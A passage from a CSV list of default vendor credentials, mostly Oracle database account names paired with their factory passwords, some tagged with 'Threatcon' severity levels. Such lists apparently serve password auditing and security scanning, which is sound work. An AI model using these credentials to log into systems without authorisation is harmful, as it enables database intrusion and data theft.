corporation,Oracle,,,ORADBA,ORADBAPASS,,, +oracle corporation,Oracle,,,ORANGE,,,, +oracle corporation,Oracle,,,ORAPROBE,ORAPROBE,,, +oracle corporation,Oracle,,,ORAREGSYS,ORAREGSYS,,, +oracle corporation,Oracle,,,ORASSO,ORASSO,,, +oracle corporation,Oracle,,,ORASSO_DS,ORASSO_DS,,, +oracle corporation,Oracle,,,ORASSO_PA,ORASSO_PA,,, +oracle corporation,Oracle,,,ORASSO_PS,ORASSO_PS,,, +oracle corporation,Oracle,,,ORASSO_PUBLIC,ORASSO_PUBLIC,,, +oracle corporation,Oracle,,,ORASTAT,ORASTAT,,, +oracle corporation,Oracle,,,ORCLADMIN,WELCOME,,, +oracle corporation,Oracle,,,ORDCOMMON,ORDCOMMON,,, +oracle corporation,Oracle,,,ORDPLUGINS,ORDPLUGINS,,, +oracle corporation,Oracle,,,ORDSYS,ORDSYS,,, +oracle corporation,Oracle,,,OSE$HTTP$ADMIN,INVALID,,, +oracle corporation,Oracle,,,OSM,OSM,,, +oracle corporation,Oracle,,,OSP22,OSP22,,, +oracle corporation,Oracle,,,OSSAQ_HOST,,,, +oracle corporation,Oracle,,,OSSAQ_PUB,,,, +oracle corporation,Oracle,,,OSSAQ_SUB,,,, +oracle corporation,Oracle,,,OTA,OTA,,, +oracle corporation,Oracle,,,OUTLN,OUTLN,,, +oracle corporation,Oracle,,,OWA,OWA,,, +oracle corporation,Oracle,,,OWA_PUBLIC,OWA_PUBLIC,,, +oracle corporation,Oracle,,,OWF_MGR,OWF_MGR,,, +oracle corporation,Oracle,,,OWNER,OWNER,,, +oracle corporation,Oracle,,,OZF,OZF,,, +oracle corporation,Oracle,,,OZP,OZP,,, +oracle corporation,Oracle,,,OZS,OZS,,, +oracle corporation,Oracle,,,PA,PA,,, +oracle corporation,Oracle,,,PANAMA,PANAMA,,, +oracle corporation,Oracle,,,PATROL,PATROL,,, +oracle corporation,Oracle,,,PAUL,PAUL,,, +oracle corporation,Oracle,,,PERFSTAT,PERFSTAT,,, +oracle corporation,Oracle,,,PERSTAT,PERSTAT,,, +oracle corporation,Oracle,,,PJM,PJM,,, +oracle corporation,Oracle,,,PLANNING,PLANNING,,, +oracle corporation,Oracle,,,PLEX,PLEX,,, +oracle corporation,Oracle,,,PLSQL,SUPERSECRET,,, +oracle corporation,Oracle,,,PM,PM,,, +oracle corporation,Oracle,,,PMI,PMI,,, +oracle corporation,Oracle,,,PN,PN,,, +oracle corporation,Oracle,,,PO,PO,,, +oracle corporation,Oracle,,,PO7,PO7,,, +oracle corporation,Oracle,,,PO8,PO8,,, +oracle corporation,Oracle,,,POA,POA,,, +oracle corporation,Oracle,,,POM,POM,,, +oracle corporation,Oracle,,,PORTAL,,,, +oracle corporation,Oracle,,,PORTAL30,PORTAL31,,, +oracle corporation,Oracle,,,PORTAL30_ADMIN,PORTAL30_ADMIN,,, +oracle corporation,Oracle,,,PORTAL30_DEMO,PORTAL30_DEMO,,, +oracle corporation,Oracle,,,PORTAL30_PS,PORTAL30_PS,,, +oracle corporation,Oracle,,,PORTAL30_PUBLIC,PORTAL30_PUBLIC,,, +oracle corporation,Oracle,,,PORTAL30_SSO,PORTAL30_SSO,,, +oracle corporation,Oracle,,,PORTAL30_SSO_ADMIN,PORTAL30_SSO_ADMIN,,, +oracle corporation,Oracle,,,PORTAL30_SSO_PS,PORTAL30_SSO_PS,,, +oracle corporation,Oracle,,,PORTAL30_SSO_PUBLIC,PORTAL30_SSO_PUBLIC,,, +oracle corporation,Oracle,,,PORTAL_APP,,,, +oracle corporation,Oracle,,,PORTAL_DEMO,,,, +oracle corporation,Oracle,,,PORTAL_PUBLIC,,,, +oracle corporation,Oracle,,,PORTAL_SSO_PS,PORTAL_SSO_PS,,, +oracle corporation,Oracle,,,POS,POS,,, +oracle corporation,Oracle,,,POWERCARTUSER,POWERCARTUSER,,, +oracle corporation,Oracle,,,PRIMARY,PRIMARY,,, +oracle corporation,Oracle,,,PSA,PSA,,, +oracle corporation,Oracle,,,PSB,PSB,,, +oracle corporation,Oracle,,,PSP,PSP,,, +oracle corporation,Oracle,,,PUBSUB,PUBSUB,,, +oracle corporation,Oracle,,,PUBSUB1,PUBSUB1,,, +oracle corporation,Oracle,,,PV,PV,,, +oracle corporation,Oracle,,,QA,QA,,, +oracle corporation,Oracle,,,QDBA,QDBA,,, +oracle corporation,Oracle,,,QP,QP,,, +oracle corporation,Oracle,,,QS,CHANGE_ON_INSTALL,,, +oracle corporation,Oracle,,,QS_ADM,UNKNOWN,,, +oracle corporation,Oracle,,,QS_CB,QS_CB,,, +oracle corporation,Oracle,,,QS_CBADM,UNKNOWN,,, +oracle corporation,Oracle,,,QS_CS,UNKNOWN,,, +oracle corporation,Oracle,,,QS_ES,CHANGE_ON_INSTALL,,, +oracle corporation,Oracle,,,QS_OS,CHANGE_ON_INSTALL,,, +oracle corporation,Oracle,,,QS_WS,UNKNOWN,,, +oracle corporation,Oracle,,,RE,RE,,, +oracle corporation,Oracle,,,REPADMIN,REPADMIN,,, +oracle corporation,Oracle,,,REPORTS,REPORTS,,, +oracle corporation,Oracle,,,REPORTS_USER,OEM_TEMP,,, +oracle corporation,Oracle,,,REP_MANAGER,DEMO,,, +oracle corporation,Oracle,,,REP_OWNER,REP_OWNER,,, +oracle corporation,Oracle,,,REP_USER,DEMO,,, +oracle corporation,Oracle,,,RG,RG,,, +oracle corporation,Oracle,,,RHX,RHX,,, +oracle corporation,Oracle,,,RLA,RLA,,, +oracle corporation,Oracle,,,RLM,RLM,,, +oracle corporation,Oracle,,,RMAIL,RMAIL,,, +oracle corporation,Oracle,,,RMAN,RMAN,,, +oracle corporation,Oracle,,,RRS,RRS,,, +oracle corporation,Oracle,,,SAMPLE,SAMPLE,,, +oracle corporation,Oracle,,,SAP,SAPR3,,, +oracle corporation,Oracle,,,SAPR3,SAP,,, +oracle corporation,Oracle,,,SCOTT,TIGGER,,, +oracle corporation,Oracle,,,SDOS_ICSAP,SDOS_ICSAP,,, +oracle corporation,Oracle,,,SECDEMO,SECDEMO,,, +oracle corporation,Oracle,,,SERVICECONSUMER1,SERVICECONSUMER1,,, +oracle corporation,Oracle,,,SH,SH,,, +oracle corporation,Oracle,,,SITEMINDER,SITEMINDER,,, +oracle corporation,Oracle,,,SI_INFORMTN_SCHEMA,SI_INFORMTN_SCHEMA,,, +oracle corporation,Oracle,,,SLIDE,SLIDEPW,,, +oracle corporation,Oracle,,,SPIERSON,SPIERSON,,, +oracle corporation,Oracle,,,SSP,SSP,,, +oracle corporation,Oracle,,,STARTER,STARTER,,, +oracle corporation,Oracle,,,STRAT_USER,STRAT_PASSWD,,, +oracle corporation,Oracle,,,SWPRO,SWPRO,,, +oracle corporation,Oracle,,,SWUSER,SWUSER,,, +oracle corporation,Oracle,,,SYMPA,SYMPA,,, +oracle corporation,Oracle,,,SYS,MANAGER,,, +oracle corporation,Oracle,,,SYSADM,SYSADM,,, +oracle corporation,Oracle,,,SYSADMIN,SYSADMIN,,, +oracle corporation,Oracle,,,SYSMAN,OEM_TEMP,,, +oracle corporation,Oracle,,,SYSTEM,ORACLE,,, +oracle corporation,Oracle,,,TAHITI,TAHITI,,, +oracle corporation,Oracle,,,TALBOT,MT6CH5,,, +oracle corporation,Oracle,,,TDOS_ICSAP,TDOS_ICSAP,,, +oracle corporation,Oracle,,,TEC,TECTEC,,, +oracle corporation,Oracle,,,TEST,TEST,,, +oracle corporation,Oracle,,,TESTPILOT,TESTPILOT,,, +oracle corporation,Oracle,,,TEST_USER,TEST_USER,,, +oracle corporation,Oracle,,,THINSAMPLE,THINSAMPLEPW,,, +oracle corporation,Oracle,,,TIBCO,TIBCO,,, +oracle corporation,Oracle,,,TIP37,TIP37,,, +oracle corporation,Oracle,,,TRACESVR,TRACE,,, +oracle corporation,Oracle,,,TRAVEL,TRAVEL,,, +oracle corporation,Oracle,,,TSDEV,TSDEV,,, +oracle corporation,Oracle,,,TSUSER,TSUSER,,, +oracle corporation,Oracle,,,TURBINE,TURBINE,,, +oracle corporation,Oracle,,,UDDISYS,,,, +oracle corporation,Oracle,,,ULTIMATE,ULTIMATE,,, +oracle corporation,Oracle,,,UM_ADMIN,UM_ADMIN,,, +oracle corporation,Oracle,,,UM_CLIENT,UM_CLIENT,,, +oracle corporation,Oracle,,,USER,USER,,, +oracle corporation,Oracle,,,USER0,USER0,,, +oracle corporation,Oracle,,,USER1,USER1,,, +oracle corporation,Oracle,,,USER2,USER2,,, +oracle corporation,Oracle,,,USER3,USER3,,, +oracle corporation,Oracle,,,USER4,USER4,,, +oracle corporation,Oracle,,,USER5,USER5,,, +oracle corporation,Oracle,,,USER6,USER6,,, +oracle corporation,Oracle,,,USER7,USER7,,, +oracle corporation,Oracle,,,USER8,USER8,,, +oracle corporation,Oracle,,,USER9,USER9,,, +oracle corporation,Oracle,,,USER_NAME,PASSWORD,,, +oracle corporation,Oracle,,,USUARIO,CLAVE,,, +oracle corporation,Oracle,,,UTILITY,UTILITY,,, +oracle corporation,Oracle,,,UTLBSTATU,UTLESTAT,,, +oracle corporation,Oracle,,,VEA,VEA,,, +oracle corporation,Oracle,,,VEH,VEH,,, +oracle corporation,Oracle,,,VERTEX_LOGIN,VERTEX_LOGIN,,, +oracle corporation,Oracle,,,VIDEOUSER,VIDEOUSER,,, +oracle corporation,Oracle,,,VIF_DEVELOPER,VIF_DEV_PWD,,, +oracle corporation,Oracle,,,VIRUSER,VIRUSER,,, +oracle corporation,Oracle,,,VPD_ADMIN,AKF7D98S2,,, +oracle corporation,Oracle,,,VRR1,UNKNOWN,,, +oracle corporation,Oracle,,,WEBCAL01,WEBCAL01,,, +oracle corporation,Oracle,,,WEBDB,WEBDB,,, +oracle corporation,Oracle,,,WEBREAD,WEBREAD,,, +oracle corporation,Oracle,,,WEBSYS,MANAGER,,, +oracle corporation,Oracle,,,WEBUSER,YOUR_PASS,,, +oracle corporation,Oracle,,,WEST,WEST,,, +oracle corporation,Oracle,,,WFADMIN,WFADMIN,,, +oracle corporation,Oracle,,,WH,WH,,, +oracle corporation,Oracle,,,WIP,WIP,,, +oracle corporation,Oracle,,,WIRELESS,,,, +oracle corporation,Oracle,,,WKADMIN,WKADMIN,,, +oracle corporation,Oracle,,,WKPROXY,UNKNOWN,,, +oracle corporation,Oracle,,,WKSYS,WKSYS,,, +oracle corporation,Oracle,,,WKUSER,WKUSER,,, +oracle corporation,Oracle,,,WK_PROXY,,,, +oracle corporation,Oracle,,,WK_SYS,,,, +oracle corporation,Oracle,,,WK_TEST,WK_TEST,,, +oracle corporation,Oracle,,,WMS,WMS,,, +oracle corporation,Oracle,,,WMSYS,WMSYS,,, +oracle corporation,Oracle,,,WOB,WOB,,, +oracle corporation,Oracle,,,WPS,WPS,,, +oracle corporation,Oracle,,,WSH,WSH,,, +oracle corporation,Oracle,,,WSM,WSM,,, +oracle corporation,Oracle,,,WWW,WWW,,, +oracle corporation,Oracle,,,WWWUSER,WWWUSER,,, +oracle corporation,Oracle,,,XADEMO,XADEMO,,, +oracle corporation,Oracle,,,XDB,CHANGE_ON_INSTALL,,, +oracle corporation,Oracle,,,XDP,XDP,,, +oracle corporation,Oracle,,,XLA,XLA,,, +oracle corporation,Oracle,,,XNC,XNC,,, +oracle corporation,Oracle,,,XNI,XNI,,, +oracle corporation,Oracle,,,XNM,XNM,,, +oracle corporation,Oracle,,,XNP,XNP,,, +oracle corporation,Oracle,,,XNS,XNS,,, +oracle corporation,Oracle,,,XPRT,XPRT,,, +oracle corporation,Oracle,,,XTR,XTR,,, +oracle,7 or later,,,Scott,Tiger,,Any, +oracle,7 or later,,,sys,change_on_install,,, +oracle,7 or later,,,system,manager,,, +oracle,8.1.7,,,,,,, +oracle,8.1.7,,Admin,,,,, +oracle,8.1.7,,Multi,,,Admin,, +oracle,8i,,,internal,oracle,,all, +oracle,8i,,,sys,change_on_install,,8.1.6, +oracle,Database,Any,,#INTERNAL,ORACLE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,#INTERNAL,SYS_STNT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ABM,ABM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ADAMS,WOOD,Threatcon 4 (least serious),, +oracle,Database,Any,,ADLDEMO,ADLDEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ADMIN,JETSPEED,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ADMIN,WELCOME,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ADMINISTRATOR,ADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ADMINISTRATOR,ADMINISTRATOR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AHL,AHL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AHM,AHM,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AK,AK,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ALHRO,XXX,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ALHRW,XXX,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ALR,ALR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AMS,AMS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,AMV,AMV,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ANDY,SWORDFISH,Threatcon 4 (least serious),, +oracle,Database,Any,,ANONYMOUS,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ANONYMOUS,ANONYMOUS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AP,AP,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPLMGR,APPLMGR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPLSYS,APPLSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPLSYS,APPS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPLSYS,FND,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPLSYSPUB,APPLSYSPUB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPLSYSPUB,FNDPUB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPLSYSPUB,PUB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPLYSYSPUB,FNDPUB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPLYSYSPUB,PUB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,APPS,APPS,Threatcon 1 (most serious),, +oracle,Database,Any,,APPS_MRC,APPS,Threatcon 1 (most serious),, +oracle,Database,Any,,APPUSER,APPPASSWORD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AQ,AQ,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AQDEMO,AQDEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AQJAVA,AQJAVA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AQUSER,AQUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AR,AR,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ASF,ASF,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ASG,ASG,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ASL,ASL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ASO,ASO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ASP,ASP,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AST,AST,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ATM,SAMPLEATM,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AUDIOUSER,AUDIOUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AURORA$JIS$UTILITY$,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AURORA$JIS$UTILITY$,INVALID,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AURORA$ORB$UNAUTHENTICATED,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AURORA$ORB$UNAUTHENTICATED,INVALID,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AX,AX,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,AZ,AZ,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,BC4J,BC4J,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,BEN,BEN,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,BIC,BIC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,BIL,BIL,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,BIM,BIM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,BIS,BIS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,BIV,BIV,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,BIX,BIX,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,BLAKE,PAPER,Threatcon 4 (least serious),, +oracle,Database,Any,,BLEWIS,BLEWIS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,BOM,BOM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,BRIO_ADMIN,BRIO_ADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,BRUGERNAVN,ADGANGSKODE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,BRUKERNAVN,PASSWORD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,BSC,BSC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,BUG_REPORTS,BUG_REPORTS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CALVIN,HOBBES,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CATALOG,CATALOG,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CCT,CCT,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CDEMO82,CDEMO82,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CDEMO82,CDEMO83,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CDEMO82,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CDEMOCOR,CDEMOCOR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CDEMORID,CDEMORID,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CDEMOUCB,CDEMOUCB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CDOUGLAS,CDOUGLAS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CE,CE,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CENTRA,CENTRA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CENTRAL,CENTRAL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CIDS,CIDS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CIS,CIS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CIS,ZWERG,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CISINFO,CISINFO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CISINFO,ZWERG,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CLARK,CLOTH,Threatcon 4 (least serious),, +oracle,Database,Any,,CLKANA,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CLKRT,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CN,CN,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,COMPANY,COMPANY,Threatcon 1 (most serious),, +oracle,Database,Any,,COMPIERE,COMPIERE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CQSCHEMAUSER,PASSWORD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CQUSERDBUSER,PASSWORD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CRP,CRP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CS,CS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CSC,CSC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CSD,CSD,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CSE,CSE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CSF,CSF,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CSI,CSI,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CSL,CSL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CSMIG,CSMIG,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CSP,CSP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CSR,CSR,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CSS,CSS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CTXDEMO,CTXDEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CTXSYS,,Threatcon 1 (most serious),, +oracle,Database,Any,,CTXSYS,CHANGE_ON_INSTALL,Threatcon 1 (most serious),, +oracle,Database,Any,,CTXSYS,CTXSYS,Threatcon 1 (most serious),, +oracle,Database,Any,,CTXSYS,UNKNOWN,Threatcon 1 (most serious),, +oracle,Database,Any,,CUA,CUA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CUE,CUE,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CUF,CUF,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CUG,CUG,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,CUI,CUI,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CUN,CUN,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CUP,CUP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CUS,CUS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,CZ,CZ,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,DATA_SCHEMA,LASKJDF098KSDAF09,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DBI,MUMBLEFRATZ,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,DBSNMP,DBSNMP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,DBVISION,DBVISION,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DCM,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DDIC,199220706,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DEMO,DEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DEMO8,DEMO8,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DEMO9,DEMO9,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DES,DES,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DES2K,DES2K,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DEV2000_DEMOS,DEV2000_DEMOS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DIANE,PASSWO1,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DIP,DIP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,DISCOVERER5,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DISCOVERER_ADMIN,DISCOVERER_ADMIN,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,DMSYS,DMSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DPF,DPFPASS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DSGATEWAY,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DSGATEWAY,DSGATEWAY,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DSSYS,DSSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,DTSP,DTSP,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EAA,EAA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,EAM,EAM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,EARLYWATCH,SUPPORT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EAST,EAST,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EC,EC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ECX,ECX,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,EJB,EJB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EJSADMIN,EJSADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EJSADMIN,EJSADMIN_PASSWORD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EMP,EMP,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ENG,ENG,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ENI,ENI,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ESTOREUSER,ESTORE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EVENT,EVENT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EVM,EVM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,EXAMPLE,EXAMPLE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EXFSYS,EXFSYS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,EXTDEMO,EXTDEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,EXTDEMO2,EXTDEMO2,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,FA,FA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,FEM,FEM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,FII,FII,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,FINANCE,FINANCE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,FINPROD,FINPROD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,FLM,FLM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,FND,FND,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,FOO,BAR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,FPT,FPT,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,FRM,FRM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,FROSTY,SNOWMAN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,FTE,FTE,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,FV,FV,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,GL,GL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,GMA,GMA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,GMD,GMD,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,GME,GME,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,GMF,GMF,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,GMI,GMI,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,GML,GML,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,GMP,GMP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,GMS,GMS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,GPFD,GPFD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,GPLD,GPLD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,GR,GR,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,HADES,HADES,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,HCPARK,HCPARK,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,HLW,HLW,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,HR,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,HR,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,HR,HR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,HR,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,HRI,HRI,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,HVST,HVST,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,HXC,HXC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,HXT,HXT,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IBA,IBA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IBE,IBE,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IBP,IBP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IBU,IBU,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IBY,IBY,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,ICDBOWN,ICDBOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ICX,ICX,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IDEMO_USER,IDEMO_USER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,IEB,IEB,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IEC,IEC,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,IEM,IEM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IEO,IEO,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IES,IES,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IEU,IEU,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IEX,IEX,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IFSSYS,IFSSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,IGC,IGC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IGF,IGF,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IGI,IGI,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IGS,IGS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IGW,IGW,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,IMAGEUSER,IMAGEUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,IMC,IMC,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,IMEDIA,IMEDIA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,IMT,IMT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,INTERNAL,ORACLE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,INTERNAL,SYS_STNT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,INV,INV,Threatcon 2 (1 is most serious),, 